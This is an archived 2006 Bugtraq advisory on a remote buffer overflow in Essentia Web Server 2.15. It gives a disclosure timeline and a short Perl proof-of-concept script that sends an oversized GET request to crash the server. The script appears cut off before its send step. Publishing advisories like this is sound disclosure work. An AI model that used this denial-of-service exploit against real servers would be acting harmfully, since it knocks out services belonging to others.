lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20061110165705.25613.qmail@securityfocus.com>
Date: 10 Nov 2006 16:57:05 -0000
From: corrado.liotta@...ce.it
To: bugtraq@...urityfocus.com
Subject: [x0n3-h4ck]Essentia Web Server v.2.15 Buffer Overflow

-=[--------------------ADVISORY-------------------]=-

              Essentia Web Server  V 2.15

            Author:CorryL      x0n3-h4ck.org
-=[-----------------------------------------------]=-


-=[+] Application:    Essentia Web Server
-=[+] Version:        2.15
-=[+] Vendor's URL:   http://www.essencomp.com
-=[+] Platform:       Windows 
-=[+] Bug type:       Buffer overflow
-=[+] Exploitation:   Remote 
-=[-]
-=[+] Author:         CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:      www.x0n3-h4ck.org
-=[+] Virtual Office: http://www.kasamba.com/CorryL

..::[ Descriprion ]::..

Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers.

..::[ Bug ]::..

This software is affection from a buffer overflow
what it would allow an attacker to perform arbitrary code
on the system victim.
Sending a GET+Ax6800 request, he would succeed 
to write above the seh point.

..::[ Proof Of Concept ]::..

#!/usr/bin/perl


use IO::Socket;

use Getopt::Std; getopts('h:', \%args);



if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";

print STDERR "-=[ Discovered By CorryL          corryl80@...il.com ]=-\n";

print STDERR "-=[ Coded by CorryL     info:www.x0n3-h4ck.org ]=-\n\n";

if (!defined($host)) {

Usage();

}

$dos = "A"x6800;

print "[+] Connect to $host\n";

$socket = new IO::Socket::INET (PeerAddr => "$host",

                               PeerPort => 80,

                               Proto => 'tcp');

                               die unless $socket;

print "[+] Sending DOS byte\n";

         $data = "GET /$dos \r\n\r\n";


..::[ Workaround ]::..

nothing

..::[ Disclousure Timeline ]::..

[30/10/2006] - Vendor notification
[04/11/2006] – No Vendor Response
[04/11/2006] - Public disclousure

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ